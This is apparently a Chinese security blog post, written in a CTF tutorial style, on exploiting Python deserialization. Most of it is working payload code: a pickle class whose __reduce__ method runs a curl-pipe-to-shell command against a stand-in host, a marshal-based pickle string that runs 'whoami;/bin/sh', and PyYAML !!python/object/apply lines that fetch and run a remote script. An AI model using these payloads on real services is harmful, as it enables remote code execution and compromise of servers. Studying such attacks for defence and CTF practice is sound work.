🎼个人主页:金灰
😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨
专注网络空间安全服务,期待与您的交流分享~
感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️
🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~
免责声明:本文仅做分享~
目录
python反序列化
payload.py
特征:
Marshal 反序列化
marshal_serialize.py
PyYAML 反序列化
危险利用:
python反序列化
python反序列化:
序列化
类对象->字节流
--------------
反序列化
字节流->对象
python序列化常用的模板:
1 pickle
2 json
报错 'nt' 时
--自己的操作系统与服务器的操作系统不一样. (用相同的操作系统操作)
payload.py
import pickle
import os
import base64
class ctf():
def __init__(self):
self.username=0
self.password=0
def login(self,username,password):
return username=='admin' and password=='123456'
def __reduce__(self): # 返回一个元组,第一个成员是 回调函数 ; 第二个成员是 回调函数的参数.
print('reduce')
return os.system,('curl https://your-shell.com/IP:3389 |sh')
c=ctf()
# 生成字节流
serialize = pickle.dumps(c)
payload = base64.b64encode(serialize)
print(payload)
# 只要有reduce方法,反序列化后,就可以执行命令...特征:
不需要 恶意类.!
反序列化字符串里面包含类的所有定义,包括类的方法
php反序列化时,只能控制类的属性,利用现有的魔术方法做跳板 .
python反序列化时,直接可以不需要恶意类,也不需要现有的魔术方法,直接产生类的定义并执行__reduce__方法
# 返回一个元组,第一个成员是 回调函数 ; 第二个成员是 回调函数的参数.Marshal 反序列化
pickle 类无法序列化 code类,为了弥补这个问题,2.6 以后增加了marshal模块来处理.
marshal_serialize.py
import base64
import pickle
import marshal
def foo():
import os
os.system('whoami;/bin/sh') # evil code
shell = """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))
print(pickle.loads(shell))PyYAML 反序列化
过滤不严,
!!python/object 标签 -->类对象
!!python/object/new 标签 -->新建一个类
!!python/object/apply 标签 -->执行python代码危险利用:
data=!!python/object/apply:os.system["curl xxx"]
data=!!python/object/apply:os.system ["curl https://your-shell.com/IP:3389 |sh"]
